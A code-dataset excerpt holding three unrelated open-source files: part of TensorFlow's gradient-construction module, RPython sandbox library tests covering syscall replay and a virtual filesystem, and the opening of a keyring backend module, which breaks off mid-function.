                                       value.dense_shape[0],
                                       name=name)
# Let IndexedSlices be used wherever a Tensor is expected, via the
# (potentially expensive) densifying conversion defined above.
ops.register_tensor_conversion_function(ops.IndexedSlices,
                                        _IndexedSlicesToTensor)
def _MarkReachedOps(from_ops, reached_ops):
  """Flood-fill `reached_ops` with every op reachable forward from `from_ops`.

  Args:
    from_ops: list of Operations to start the traversal from.
    reached_ops: list of booleans, indexed by operation id; the entry for
      every visited op is set to True in place.
  """
  worklist = collections.deque(from_ops)
  while worklist:
    op = worklist.popleft()
    if reached_ops[op._id]:
      continue
    reached_ops[op._id] = True
    # Follow every consumer of every output (forward edges).
    for out in op.outputs:
      worklist.extend(out.consumers())
def _GatherInputs(to_ops, reached_ops):
  """Collect the ops flagged in `reached_ops` walking backwards from `to_ops`.

  Args:
    to_ops: list of Operations to start from.
    reached_ops: list of booleans, indexed by operation id.  The flag of
      each collected op is cleared in place so it is reported only once.

  Returns:
    The list of all inputs of to_ops that are in reached_ops.  That list
    includes all elements of to_ops.
  """
  collected = []
  worklist = collections.deque(to_ops)
  while worklist:
    op = worklist.popleft()
    if not reached_ops[op._id]:
      continue
    collected.append(op)
    # Clear the flag so this op's inputs are not enqueued a second time.
    reached_ops[op._id] = False
    worklist.extend(inp.op for inp in op.inputs)
  return collected
def _GetGradsDevice(op, colocate_gradients_with_ops):
  """Pick the device on which to place the gradients of `op`.

  Args:
    op: an Operation.
    colocate_gradients_with_ops: If True, prefer the device of `op` itself.

  Returns:
    A device string: `op`'s own device when colocation is requested and the
    op has a device assigned, otherwise the graph's default device.
  """
  colocate = colocate_gradients_with_ops and op.device
  return op.device if colocate else op.graph.get_default_device()
def _PendingCount(graph, to_ops, from_ops):
  """Initialize the pending count for ops between two lists of Operations.

  'pending_count[op._id]' indicates the number of backprop inputs
  to this operation.

  Args:
    graph: a Graph.
    to_ops: list of Operations.
    from_ops: list of Operations.

  Returns:
    A tuple containing: (1) a list of integers indexed by operation id,
    indicating the number of backprop inputs to this operation, and (2)
    a boolean which is True if any of the ops in between from_ops and to_ops
    contain control flow loops.
  """
  # Mark reachable ops from from_ops.
  # Pre-marking the to_ops stops the forward flood-fill at the outputs.
  reached_ops = [False] * (graph._last_id + 1)
  for op in to_ops:
    reached_ops[op._id] = True
  _MarkReachedOps(from_ops, reached_ops)
  # Mark between ops: ops on some path from from_ops to to_ops, found by
  # walking backwards from to_ops through the forward-reachable set.
  between_ops = [False] * (graph._last_id + 1)
  between_op_list = []
  queue = collections.deque()
  queue.extend(to_ops)
  while queue:
    op = queue.popleft()
    # We are interested in this op.
    if reached_ops[op._id]:
      between_ops[op._id] = True
      between_op_list.append(op)
      # Clear the boolean so we won't add the inputs again.
      reached_ops[op._id] = False
      for x in op.inputs:
        queue.append(x.op)
  # Initialize pending count for between ops: each op's count is the number
  # of its consumers (data or control) that are themselves between ops.
  pending_count = [0] * (graph._last_id + 1)
  has_control_flow = False
  for op in between_op_list:
    for x in op.inputs:
      if between_ops[x.op._id]:
        pending_count[x.op._id] += 1
    for x in op.control_inputs:
      if between_ops[x._id]:
        pending_count[x._id] += 1
    # An Exit op marks a while-loop; backprop then needs grad contexts.
    if op.type == "Exit":
      has_control_flow = True
  return pending_count, has_control_flow
def _AsList(x):
  """Return `x` unchanged if it is a list or tuple, else wrap it in a list."""
  if isinstance(x, (list, tuple)):
    return x
  return [x]
def _DefaultGradYs(grad_ys, ys, colocate_gradients_with_ops):
  """Fill in default values for grad_ys.

  Args:
    grad_ys: List of gradients, can contain None.
    ys: List of tensors.
    colocate_gradients_with_ops: If True, try colocating gradients with
      the corresponding op.

  Returns:
    A list of gradients to use, without None.

  Raises:
    ValueError: If one of the grad_ys is invalid.
  """
  if len(grad_ys) != len(ys):
    raise ValueError("Passed %d grad_ys for %d ys" % (len(grad_ys), len(ys)))
  grad_ys = ops.convert_n_to_tensor_or_indexed_slices(grad_ys, name="grad_y")
  for i in xrange(len(grad_ys)):
    grad_y = grad_ys[i]
    y = ys[i]
    if grad_y is None:
      # Missing entry: default to a tensor of ones shaped like y, placed on
      # the device chosen by the colocation policy.
      with ops.device(_GetGradsDevice(y.op, colocate_gradients_with_ops)):
        grad_ys[i] = array_ops.fill(
            array_ops.shape(y),
            constant_op.constant(1,
                                 dtype=y.dtype))
    else:
      # Supplied entry: must match the dtype of its y exactly.
      if grad_y.dtype != y.dtype:
        raise ValueError("Y and ys_grad must be of the same type, "
                         "not y: %s, ys_grad: %s " %
                         (dtypes.as_dtype(y.dtype).name,
                          dtypes.as_dtype(grad_y.dtype).name))
  return grad_ys
def _VerifyGeneratedGradients(grads, op):
  """Sanity-check generated gradients: one per input, with compatible dtypes.

  Args:
    grads: List of generated gradients.
    op: Operation for which the gradients where generated.

  Raises:
    ValueError: if the gradients are invalid.
  """
  if len(grads) != len(op.inputs):
    raise ValueError("Num gradients %d generated for op %s do not match num "
                     "inputs %d" % (len(grads), op.node_def, len(op.inputs)))
  for grad, inp in zip(grads, op.inputs):
    if grad is None:
      continue
    if not grad.dtype.is_compatible_with(inp.dtype):
      raise ValueError("Gradient type %s generated for op %s does "
                       "not match input type %s" %
                       (dtypes.as_dtype(grad.dtype).name, op.node_def,
                        dtypes.as_dtype(inp.dtype).name))
def _StopOps(from_ops, pending_count):
  """Compute the frontier of the forward graph where backprop must stop.

  Operations in the returned set will not be differentiated.  The set is
  the subset of `from_ops` with no predecessor in `from_ops`, where
  `pending_count` is the result of `_PendingCount(g, xs, from_ops)` and an
  op has predecessors in `from_ops` iff pending_count[op._id] > 0.

  Args:
    from_ops: list of Operations.
    pending_count: List of integers, indexed by operation id.

  Returns:
    The set of operation ids at which backprop terminates.
  """
  frontier = set()
  for op in from_ops:
    has_predecessor = any(pending_count[inp.op._id] > 0 for inp in op.inputs)
    if not has_predecessor:
      frontier.add(op._id)
  return frontier
def gradients(ys,
              xs,
              grad_ys=None,
              name="gradients",
              colocate_gradients_with_ops=False,
              gate_gradients=False,
              aggregation_method=None):
  """Constructs symbolic partial derivatives of `ys` w.r.t. x in `xs`.

  `ys` and `xs` are each a `Tensor` or a list of tensors.  `grad_ys`
  is a list of `Tensor`, holding the gradients received by the
  `ys`. The list must be the same length as `ys`.

  `gradients()` adds ops to the graph to output the partial
  derivatives of `ys` with respect to `xs`.  It returns a list of
  `Tensor` of length `len(xs)` where each tensor is the `sum(dy/dx)`
  for y in `ys`.

  `grad_ys` is a list of tensors of the same length as `ys` that holds
  the initial gradients for each y in `ys`.  When `grad_ys` is None,
  we fill in a tensor of '1's of the shape of y for each y in `ys`.  A
  user can provide their own initial `grad_ys` to compute the
  derivatives using a different initial gradient for each y (e.g., if
  one wanted to weight the gradient differently for each value in
  each y).

  Args:
    ys: A `Tensor` or list of tensors to be differentiated.
    xs: A `Tensor` or list of tensors to be used for differentiation.
    grad_ys: Optional. A `Tensor` or list of tensors the same size as
      `ys` and holding the gradients computed for each y in `ys`.
    name: Optional name to use for grouping all the gradient ops together.
      defaults to 'gradients'.
    colocate_gradients_with_ops: If True, try colocating gradients with
      the corresponding op.
    gate_gradients: If True, add a tuple around the gradients returned
      for an operations.  This avoids some race conditions.
    aggregation_method: Specifies the method used to combine gradient terms.
      Accepted values are constants defined in the class `AggregationMethod`.

  Returns:
    A list of `sum(dy/dx)` for each x in `xs`.

  Raises:
    LookupError: if one of the operations between `x` and `y` does not
      have a registered gradient function.
    ValueError: if the arguments are invalid.

  """
  ys = _AsList(ys)
  xs = _AsList(xs)
  if grad_ys is None:
    grad_ys = [None] * len(ys)
  else:
    grad_ys = _AsList(grad_ys)
  with ops.op_scope(ys + xs + grad_ys, name, "gradients"):
    ys = ops.convert_n_to_tensor_or_indexed_slices(ys, name="y")
    xs = ops.convert_n_to_tensor_or_indexed_slices(xs, name="x")
    grad_ys = _DefaultGradYs(grad_ys, ys, colocate_gradients_with_ops)

    # The approach we take here is as follows: Create a list of all ops in the
    # subgraph between the ys and xs.  Visit these ops in reverse order of ids
    # to ensure that when we visit an op the gradients w.r.t its outputs have
    # been collected.  Then aggregate these gradients if needed, call the op's
    # gradient function, and add the generated gradients to the gradients for
    # its input.

    # Initialize the pending count for ops in the connected subgraph from ys
    # to the xs.
    to_ops = [t.op for t in ys]
    from_ops = [t.op for t in xs]
    pending_count, has_control_flow = _PendingCount(ops.get_default_graph(),
                                                   to_ops, from_ops)

    # Iterate over the collected ops.
    #
    # grads: op => list of gradients received on each output endpoint of the
    # op.  The gradients for each endpoint are initially collected as a list.
    # When it is time to call the op's gradient function, for each endpoint we
    # aggregate the list of received gradients into a Add() Operation if there
    # is more than one.
    grads = {}

    # Add the initial gradients for the ys.
    for y, grad_y in zip(ys, grad_ys):
      _SetGrad(grads, y, grad_y)

    # Initialize queue with to_ops.
    queue = collections.deque()
    # Add the ops in 'to_ops' into the queue.
    to_ops_set = set()
    for op in to_ops:
      if op._id not in to_ops_set:
        to_ops_set.add(op._id)
        queue.append(op)
    # The set of 'from_ops'.
    stop_ops = _StopOps(from_ops, pending_count)
    while queue:
      # generate gradient subgraph for op.
      op = queue.popleft()
      with ops.device(_GetGradsDevice(op, colocate_gradients_with_ops)):
        if has_control_flow:
          control_flow_ops.EnterGradWhileContext(op)
        out_grads = _AggregatedGrads(grads, op, has_control_flow,
                                     aggregation_method)
        grad_fn = None
        if any(out_grads) and op._id not in stop_ops:
          # A grad_fn must be defined, either as a function or as None
          # for ops that do not have gradients.
          try:
            grad_fn = ops.get_gradient_function(op)
          except LookupError:
            raise LookupError(
                "No gradient defined for operation '%s' (op type: %s)" %
                (op.name, op.type))
        if grad_fn and any(out_grads):
          # NOTE: If _AggregatedGrads didn't compute a value for the i'th
          # output, it means that the cost does not depend on output[i],
          # therefore dC/doutput[i] is 0.
          for i, out_grad in enumerate(out_grads):
            if (not out_grad and
                dtypes.as_dtype(op.outputs[i].dtype).base_dtype in
                (dtypes.float32, dtypes.float64)):
              # Only floating-point outputs get a zero gradient. Gradient
              # functions should ignore the gradient for other outputs.
              out_grads[i] = array_ops.zeros_like(op.outputs[i])
          with ops.name_scope(op.name + "_grad"):
            # pylint: disable=protected-access
            with ops.get_default_graph()._original_op(op):
              # pylint: enable=protected-access
              op_wrapper = op
              if has_control_flow:
                op_wrapper = control_flow_ops.MakeWrapper(op)
              in_grads = _AsList(grad_fn(op_wrapper, *out_grads))
              _VerifyGeneratedGradients(in_grads, op)
              if gate_gradients and len(in_grads) > 1:
                in_grads = control_flow_ops.tuple(in_grads)
          logging.vlog(1, "Gradient for '" + op.name + "'")
          logging.vlog(1, " in --> %s",
                       ", ".join([x.name for x in out_grads if x]))
          logging.vlog(1, " out --> %s",
                       ", ".join([x.name for x in in_grads if x]))
        else:
          # If no grad_fn is defined or none of out_grads is available,
          # just propagates a list of None backwards.
          in_grads = [None] * len(op.inputs)
        for t_in, in_grad in zip(op.inputs, in_grads):
          if in_grad:
            _SetGrad(grads, t_in, in_grad)
        if has_control_flow:
          control_flow_ops.ExitGradWhileContext(op)

      # update pending count for the inputs of op.
      for x in op.inputs:
        pending_count[x.op._id] -= 1
        ready = (pending_count[x.op._id] == 0)
        if has_control_flow and not ready:
          ready = (pending_count[x.op._id] > 0 and
                   control_flow_ops.IsLoopSwitch(x.op))
        if ready:
          queue.append(x.op)
      for x in op.control_inputs:
        pending_count[x._id] -= 1
        # BUGFIX: was `pending_count[x._id] is 0`, an identity comparison
        # that only works by accident of CPython's small-int caching.
        if pending_count[x._id] == 0:
          queue.append(x)
  return [_GetGrad(grads, x) for x in xs]
def _SetGrad(grads, t, grad):
  """Record `grad` as an incoming gradient for tensor `t` in the map `grads`."""
  op = t.op
  if op not in grads or not grads[op]:
    # One accumulation list per output endpoint of the producing op.
    grads[op] = [[] for _ in op.outputs]
  entry = grads[op][t.value_index]
  if isinstance(entry, list):
    entry.append(grad)
  else:
    # Only control-flow Switch ops store a single gradient directly.
    assert op.type == "Switch"
    grads[op][t.value_index] = grad
def _GetGrad(grads, t):
  """Return the (already aggregated) gradient for tensor `t`, or None."""
  per_output = grads.get(t.op)
  if not per_output:
    return None
  grad = per_output[t.value_index]
  assert not isinstance(grad, list), (
      "gradients list should have been aggregated by now.")
  return grad
def _GetGrads(grads, op):
  """Return the per-output gradient lists for `op` (fresh empties if absent)."""
  if op in grads:
    return grads[op]
  return [[] for _ in op.outputs]
def _HandleNestedIndexedSlices(grad):
  """Flatten an IndexedSlices whose values may themselves be IndexedSlices."""
  assert isinstance(grad, ops.IndexedSlices)
  if isinstance(grad.values, ops.Tensor):
    # Already flat: plain tensor values.
    return grad
  assert isinstance(grad.values, ops.IndexedSlices)
  inner = _HandleNestedIndexedSlices(grad.values)
  # Compose the two levels of indexing into one gather.
  return ops.IndexedSlices(inner.values,
                           array_ops.gather(grad.indices, inner.indices),
                           inner.dense_shape)
def _AccumulatorShape(inputs):
  """Merge the static shapes of all Tensors in `inputs` into one TensorShape."""
  merged = tensor_shape.unknown_shape()
  for item in inputs:
    if isinstance(item, ops.Tensor):
      merged = merged.merge_with(item.get_shape())
  return merged
class AggregationMethod(object):
  """Constants naming the strategies for combining gradient contributions.

  When a tensor feeds several ops, backprop produces one gradient term per
  consumer and those terms must be summed.  Members of this class select how
  that summation is built into the graph:

  * `ADD_N`: a single "AddN" op sums every term at once; all gradients must
    be ready before any aggregation is performed.
  * `DEFAULT`: the system-chosen default aggregation method.
  """
  ADD_N = 0
  DEFAULT = ADD_N
  # The following are experimental and may not be supported in future releases.
  EXPERIMENTAL_TREE = 1
  EXPERIMENTAL_ACCUMULATE_N = 2
def _AggregatedGrads(grads, op, has_control_flow, aggregation_method=None):
  """Get the aggregated gradients for op.

  Args:
    grads: The map of memoized gradients.
    op: The op to get gradients for.
    has_control_flow: True iff the graph contains control flow ops.
    aggregation_method: Specifies the method used to combine gradient terms.
      Accepted values are constants defined in the class `AggregationMethod`.

  Returns:
    A list of gradients, one per each output of `op`.  If the gradients
    for a particular output is a list, this function aggregates it
    before returning.

  Raises:
    TypeError: if the incoming grads are not Tensors or IndexedSlices.
    ValueError: if the arguments are invalid.
  """
  if aggregation_method is None:
    aggregation_method = AggregationMethod.DEFAULT
  if aggregation_method not in [AggregationMethod.ADD_N,
                                AggregationMethod.EXPERIMENTAL_TREE,
                                AggregationMethod.EXPERIMENTAL_ACCUMULATE_N]:
    raise ValueError("Invalid aggregation_method specified.")
  out_grads = _GetGrads(grads, op)
  for i, out_grad in enumerate(out_grads):
    if has_control_flow:
      # Switch ops store a single gradient (set by _SetGrad), not a list;
      # leave it as-is.
      if isinstance(out_grad, (ops.Tensor, ops.IndexedSlices)):
        assert op.type == "Switch"
        continue
    # Grads have to be Tensors or IndexedSlices
    if not all([isinstance(g, (ops.Tensor, ops.IndexedSlices))
                for g in out_grad if g]):
      raise TypeError("gradients have to be either all Tensors "
                      "or all IndexedSlices")
    # Aggregate multiple gradients, and convert [] to None.
    if out_grad:
      if all([isinstance(g, ops.Tensor) for g in out_grad if g]):
        # BUGFIX: renamed from `tensor_shape`, which shadowed the
        # tensor_shape module imported at the top of this file.
        accum_shape = _AccumulatorShape(out_grad)
        if len(out_grad) < 2:
          used = "nop"
          out_grads[i] = out_grad[0]
        elif (aggregation_method == AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
              and len(out_grad) > 2 and accum_shape.is_fully_defined()):
          # The benefit of using AccumulateN is that its inputs can be combined
          # in any order and this can allow the expression to be evaluated with
          # a smaller memory footprint.  When used with gpu_allocator_retry,
          # it is possible to compute a sum of terms which are much larger than
          # total GPU memory.
          # AccumulateN can currently only be used if we know the shape for
          # an accumulator variable.  If this is not known, or if we only have
          # 2 grads then we fall through to the "tree" case below.
          used = "accumulate_n"
          out_grads[i] = math_ops.accumulate_n(out_grad)
        elif aggregation_method in [AggregationMethod.EXPERIMENTAL_TREE,
                                    AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
                                   ]:
          # Aggregate all gradients by doing pairwise sums: this may
          # reduce performance, but it can improve memory because the
          # gradients can be released earlier.
          #
          # TODO(vrv): Consider replacing this with a version of
          # tf.AddN() that eagerly frees its inputs as soon as they are
          # ready, so the order of this tree does not become a problem.
          used = "tree"
          with ops.name_scope(op.name + "_gradient_sum"):
            running_sum = out_grad[0]
            for grad in out_grad[1:]:
              running_sum = math_ops.add_n([running_sum, grad])
            out_grads[i] = running_sum
        else:
          used = "add_n"
          out_grads[i] = math_ops.add_n(out_grad)
        logging.vlog(2, " _AggregatedGrads %d x %s using %s", len(out_grad),
                     accum_shape, used)
      else:
        # At least one IndexedSlices: flatten any nesting, then concatenate
        # all slices into one IndexedSlices for this output.
        out_grad = math_ops._as_indexed_slices_list([g for g in out_grad if g])
        out_grad = [_HandleNestedIndexedSlices(x) for x in out_grad]
        # Form IndexedSlices out of the concatenated values and
        # indices.
        out_grads[i] = ops.IndexedSlices(
            array_ops.concat(0, [x.values for x in out_grad]),
            array_ops.concat(0, [x.indices
                                 for x in out_grad]), out_grad[0].dense_shape)
    else:
      out_grads[i] = []
  return out_grads
# TODO(vrv): Make this available when we want to make it public.
def _hessian_vector_product(ys, xs, v):
  """Multiply the Hessian of `ys` wrt `xs` by `v`.

  This is an efficient construction that uses a backprop-like approach
  to compute the product between the Hessian and another vector.  The
  Hessian is usually too large to be explicitly computed or even
  represented, but this method allows us to at least multiply by it
  for the same big-O cost as backprop.

  Implicit Hessian-vector products are the main practical, scalable way
  of using second derivatives with neural networks.  They allow us to
  do things like construct Krylov subspaces and approximate conjugate
  gradient descent.

  Example: if `y` = 1/2 `x`^T A `x`, then `hessian_vector_product(y,
  x, v)` will return an expression that evaluates to the same values
  as (A + A.T) `v`.

  Args:
    ys: A scalar value, or a tensor or list of tensors to be summed to
        yield a scalar.
    xs: A list of tensors that we should construct the Hessian over.
    v: A list of tensors, with the same shapes as xs, that we want to
       multiply by the Hessian.

  Returns:
    A list of tensors (or if the list would be length 1, a single tensor)
    containing the product between the Hessian and `v`.

  Raises:
    ValueError: `xs` and `v` have different length.
  """
  if len(v) != len(xs):
    raise ValueError("xs and v must have the same length.")

  # First backprop: g = d(sum(ys))/d(xs).
  first_grads = gradients(ys, xs)
  assert len(first_grads) == len(xs)

  # Form <g, v> with v held constant, so the second backprop
  # differentiates only through g.
  products = [math_ops.mul(g, array_ops.stop_gradient(v_elem))
              for g, v_elem in zip(first_grads, v)
              if g is not None]

  # Second backprop: d<g, v>/d(xs) = H v.
  return gradients(products, xs)
| apache-2.0 |
oblique-labs/pyVM | rpython/translator/sandbox/test/test_sandlib.py | 1 | 8723 | import py
import errno, os, StringIO
from rpython.tool.sourcetools import func_with_new_name
from rpython.rtyper.lltypesystem import rffi
from rpython.translator.sandbox.sandlib import SandboxedProc
from rpython.translator.sandbox.sandlib import SimpleIOSandboxedProc
from rpython.translator.sandbox.sandlib import VirtualizedSandboxedProc
from rpython.translator.sandbox.sandlib import VirtualizedSocketProc
from rpython.translator.sandbox.test.test_sandbox import compile
from rpython.translator.sandbox.vfs import Dir, File, RealDir, RealFile
class MockSandboxedProc(SandboxedProc):
    """A sandbox process wrapper that replays expected syscalls.

    `expected` is a list of (syscall-name, args-tuple, result) triples; each
    incoming syscall from the subprocess must match the next triple in order,
    and the recorded result (or Exception, which is raised) is returned.
    `seen` counts how many expected entries have been consumed.
    """
    def __init__(self, args, expected):
        SandboxedProc.__init__(self, args)
        self.expected = expected
        self.seen = 0

    def _make_method(name):
        # Class-body helper (note: no `self`) that manufactures a
        # do_ll_os__ll_os_<name> handler bound to one syscall name.
        def do_xxx(self, *input):
            print "decoded from subprocess: %s%r" % (name, input)
            expectedmsg, expectedinput, output = self.expected[self.seen]
            assert name == expectedmsg
            assert input == expectedinput
            self.seen += 1
            if isinstance(output, Exception):
                raise output
            return output
        return func_with_new_name(do_xxx, 'do_%s' % name)

    do_ll_os__ll_os_open = _make_method("open")
    do_ll_os__ll_os_read = _make_method("read")
    do_ll_os__ll_os_write = _make_method("write")
    do_ll_os__ll_os_close = _make_method("close")
def test_lib():
    """Compile a sandboxed binary and replay its exact syscall sequence."""
    def entry_point(argv):
        fd = os.open("/tmp/foobar", os.O_RDONLY, 0777)
        assert fd == 77
        res = os.read(fd, 123)
        assert res == "he\x00llo"
        count = os.write(fd, "world\x00!\x00")
        assert count == 42
        for arg in argv:
            count = os.write(fd, arg)
            assert count == 61
        os.close(fd)
        return 0
    exe = compile(entry_point)

    # The expected list mirrors entry_point's syscalls one-to-one, including
    # the writes of argv[0] (the exe path) and the two extra arguments.
    proc = MockSandboxedProc([exe, 'x1', 'y2'], expected = [
        ("open", ("/tmp/foobar", os.O_RDONLY, 0777), 77),
        ("read", (77, 123), "he\x00llo"),
        ("write", (77, "world\x00!\x00"), 42),
        ("write", (77, exe), 61),
        ("write", (77, "x1"), 61),
        ("write", (77, "y2"), 61),
        ("close", (77,), None),
        ])
    proc.handle_forever()
    assert proc.seen == len(proc.expected)
def test_foobar():
    """Replay an external C function call through the sandbox (disabled)."""
    py.test.skip("to be updated")
    foobar = rffi.llexternal("foobar", [rffi.CCHARP], rffi.LONG)
    def entry_point(argv):
        s = rffi.str2charp(argv[1]); n = foobar(s); rffi.free_charp(s)
        s = rffi.str2charp(argv[n]); n = foobar(s); rffi.free_charp(s)
        return n
    exe = compile(entry_point)

    proc = MockSandboxedProc([exe, 'spam', 'egg'], expected = [
        ("foobar", ("spam",), 2),
        ("foobar", ("egg",), 0),
        ])
    proc.handle_forever()
    assert proc.seen == len(proc.expected)
def test_simpleio():
    """stdin/stdout of the sandboxed process round-trip through communicate()."""
    def entry_point(argv):
        print "Please enter a number:"
        buf = ""
        while True:
            t = os.read(0, 1) # 1 character from stdin
            if not t:
                raise EOFError
            if t == '\n':
                break
            buf += t
        num = int(buf)
        print "The double is:", num * 2
        return 0
    exe = compile(entry_point)

    proc = SimpleIOSandboxedProc([exe, 'x1', 'y2'])
    output, error = proc.communicate("21\n")
    assert output == "Please enter a number:\nThe double is: 42\n"
    assert error == ""
def test_socketio():
    """Virtualized sockets: open("tcp://host:port") gives a network fd.

    NOTE(review): requires live network access to python.org.
    """
    class SocketProc(VirtualizedSocketProc, SimpleIOSandboxedProc):
        def build_virtual_root(self):
            pass

    def entry_point(argv):
        fd = os.open("tcp://python.org:80", os.O_RDONLY, 0777)
        os.write(fd, 'GET /\n')
        print os.read(fd, 50)
        return 0
    exe = compile(entry_point)

    proc = SocketProc([exe])
    output, error = proc.communicate("")
    assert output.startswith('HTTP/1.1 301 Moved Permanently')
def test_oserror():
    """An OSError recorded in `expected` propagates into the subprocess."""
    def entry_point(argv):
        try:
            os.open("/tmp/foobar", os.O_RDONLY, 0777)
        except OSError as e:
            os.close(e.errno) # nonsense, just to see outside
        return 0
    exe = compile(entry_point)

    proc = MockSandboxedProc([exe], expected = [
        ("open", ("/tmp/foobar", os.O_RDONLY, 0777), OSError(-42, "baz")),
        ("close", (-42,), None),
        ])
    proc.handle_forever()
    assert proc.seen == len(proc.expected)
class SandboxedProcWithFiles(VirtualizedSandboxedProc, SimpleIOSandboxedProc):
    """A sandboxed process with a simple virtualized filesystem.

    For testing file operations.  The virtual root exposes a small in-memory
    text file plus this very test file mapped read-only from the real disk.
    """
    def build_virtual_root(self):
        return Dir({
            'hi.txt': File("Hello, world!\n"),
            'this.pyc': RealFile(__file__),
             })
def test_too_many_opens():
    """Opening many fds must hit the sandbox's EMFILE limit, for both
    purely virtual files and real files mapped into the virtual root."""
    def entry_point(argv):
        try:
            open_files = []
            for i in range(500):
                fd = os.open('/hi.txt', os.O_RDONLY, 0777)
                open_files.append(fd)
                txt = os.read(fd, 100)
                if txt != "Hello, world!\n":
                    print "Wrong content: %s" % txt
        except OSError as e:
            # We expect to get EMFILE, for opening too many files.
            if e.errno != errno.EMFILE:
                print "OSError: %s!" % (e.errno,)
        else:
            print "We opened 500 fake files! Shouldn't have been able to."

        # Release everything so the second round starts from a clean slate.
        for fd in open_files:
            os.close(fd)

        try:
            open_files = []
            for i in range(500):
                fd = os.open('/this.pyc', os.O_RDONLY, 0777)
                open_files.append(fd)
        except OSError as e:
            # We expect to get EMFILE, for opening too many files.
            if e.errno != errno.EMFILE:
                print "OSError: %s!" % (e.errno,)
        else:
            print "We opened 500 real files! Shouldn't have been able to."

        print "All ok!"
        return 0
    exe = compile(entry_point)

    proc = SandboxedProcWithFiles([exe])
    output, error = proc.communicate("")
    assert output == "All ok!\n"
    assert error == ""
def test_fstat():
    """stat() and fstat() of the same virtual file must agree field by field."""
    def compare(a, b, i):
        if a != b:
            print "stat and fstat differ @%d: %s != %s" % (i, a, b)

    def entry_point(argv):
        try:
            # Open a file, and compare stat and fstat
            fd = os.open('/hi.txt', os.O_RDONLY, 0777)
            st = os.stat('/hi.txt')
            fs = os.fstat(fd)
            # RPython requires the index for stat to be a constant.. :(
            compare(st[0], fs[0], 0)
            compare(st[1], fs[1], 1)
            compare(st[2], fs[2], 2)
            compare(st[3], fs[3], 3)
            compare(st[4], fs[4], 4)
            compare(st[5], fs[5], 5)
            compare(st[6], fs[6], 6)
            compare(st[7], fs[7], 7)
            compare(st[8], fs[8], 8)
            compare(st[9], fs[9], 9)
        except OSError as e:
            print "OSError: %s" % (e.errno,)
        print "All ok!"
        return 0
    exe = compile(entry_point)

    proc = SandboxedProcWithFiles([exe])
    output, error = proc.communicate("")
    assert output == "All ok!\n"
    assert error == ""
def test_lseek():
    # Exercise lseek() with all three whence modes against the virtual
    # file "Hello, world!\n" (14 bytes) and verify the reported offsets
    # and the characters read at each position.
    def char_should_be(c, should):
        if c != should:
            print "Wrong char: '%s' should be '%s'" % (c, should)
    def entry_point(argv):
        fd = os.open('/hi.txt', os.O_RDONLY, 0777)
        char_should_be(os.read(fd, 1), "H")
        new = os.lseek(fd, 3, os.SEEK_CUR)
        if new != 4:
            print "Wrong offset, %d should be 4" % new
        char_should_be(os.read(fd, 1), "o")
        new = os.lseek(fd, -3, os.SEEK_END)
        if new != 11:
            print "Wrong offset, %d should be 11" % new
        char_should_be(os.read(fd, 1), "d")
        new = os.lseek(fd, 7, os.SEEK_SET)
        if new != 7:
            print "Wrong offset, %d should be 7" % new
        char_should_be(os.read(fd, 1), "w")
        print "All ok!"
        return 0
    exe = compile(entry_point)
    proc = SandboxedProcWithFiles([exe])
    output, error = proc.communicate("")
    assert output == "All ok!\n"
    assert error == ""
def test_getuid():
    # Skip on platforms without POSIX uid/gid support (e.g. Windows).
    if not hasattr(os, 'getuid'):
        py.test.skip("posix only")
    def entry_point(argv):
        import os
        print "uid is %s" % os.getuid()
        print "euid is %s" % os.geteuid()
        print "gid is %s" % os.getgid()
        print "egid is %s" % os.getegid()
        return 0
    exe = compile(entry_point)
    proc = SandboxedProcWithFiles([exe])
    output, error = proc.communicate("")
    # NOTE(review): this expects all four ids to be 1000 -- presumably the
    # sandbox layer virtualizes getuid/getgid rather than exposing the
    # host's real ids; confirm, otherwise this test is host-dependent.
    assert output == "uid is 1000\neuid is 1000\ngid is 1000\negid is 1000\n"
    assert error == ""
| mit |
robinson96/GRAPE | keyring/keyring/backend.py | 1 | 3766 | """
Keyring implementation support
"""
from __future__ import absolute_import
import abc
import itertools
from keyring.keyring import errors
from keyring.keyring.util import properties
from keyring.keyring import util
class KeyringBackendMeta(abc.ABCMeta):
    """
    An ABCMeta subtype that additionally maintains a registry of every
    concrete (non-abstract) class it creates.
    """

    def __init__(cls, name, bases, namespace):
        super(KeyringBackendMeta, cls).__init__(name, bases, namespace)
        # The registry is created lazily on the first class built with
        # this metaclass and is then shared by all of its subclasses.
        if not hasattr(cls, '_classes'):
            cls._classes = set()
        # Only fully concrete classes (no remaining abstract methods)
        # are entered into the registry.
        if not cls.__abstractmethods__:
            cls._classes.add(cls)
class KeyringBackend(object):
    """The abstract base class of the keyring, every backend must implement
    this interface.
    """
    # Python 2 metaclass hook: KeyringBackendMeta registers every concrete
    # subclass in a shared registry consumed by get_all_keyring().
    __metaclass__ = KeyringBackendMeta

    #@abc.abstractproperty
    def priority(cls):
        """
        Each backend class must supply a priority, a number (float or integer)
        indicating the priority of the backend relative to all other backends.
        The priority need not be static -- it may (and should) vary based
        on attributes of the environment in which it runs (platform,
        available packages, etc.).

        A higher number indicates a higher priority. The priority should raise
        a RuntimeError with a message indicating the underlying cause if the
        backend is not suitable for the current environment.

        As a rule of thumb, a priority between zero but less than one is
        suitable, but a priority of one or greater is recommended.
        """

    @properties.ClassProperty
    @classmethod
    def viable(cls):
        # A backend is viable when merely reading its priority does not
        # raise; ExceptionRaisedContext captures any exception.
        with errors.ExceptionRaisedContext() as exc:
            cls.priority
        return not bool(exc)

    @abc.abstractmethod
    def get_password(self, service, username):
        """Get password of the username for the service
        """
        return None

    @abc.abstractmethod
    def set_password(self, service, username, password):
        """Set password for the username of the service
        """
        raise errors.PasswordSetError("reason")

    # for backward-compatibility, don't require a backend to implement
    # delete_password
    #@abc.abstractmethod
    def delete_password(self, service, username):
        """Delete the password for the username of the service.
        """
        raise errors.PasswordDeleteError("reason")
class Crypter(object):
    """Abstract base providing the encrypt/decrypt interface."""

    @abc.abstractmethod
    def encrypt(self, value):
        """Return the encrypted form of *value*."""

    @abc.abstractmethod
    def decrypt(self, value):
        """Return the decrypted form of *value*."""
class NullCrypter(Crypter):
    """No-op crypter: values pass through both directions unchanged."""

    def encrypt(self, value):
        # Identity transform -- nothing is actually encrypted.
        return value

    def decrypt(self, value):
        # Identity transform -- nothing is actually decrypted.
        return value
@util.once
def get_all_keyring():
    """
    Return a list of all implemented keyrings that can be constructed without
    parameters.
    """
    # ensure that all keyring backends are loaded
    for mod_name in ('file', 'Gnome', 'Google', 'keyczar', 'kwallet', 'multi',
            'OS_X', 'pyfs', 'SecretService', 'Windows'):
        # use fromlist to cause the module to resolve under Demand Import
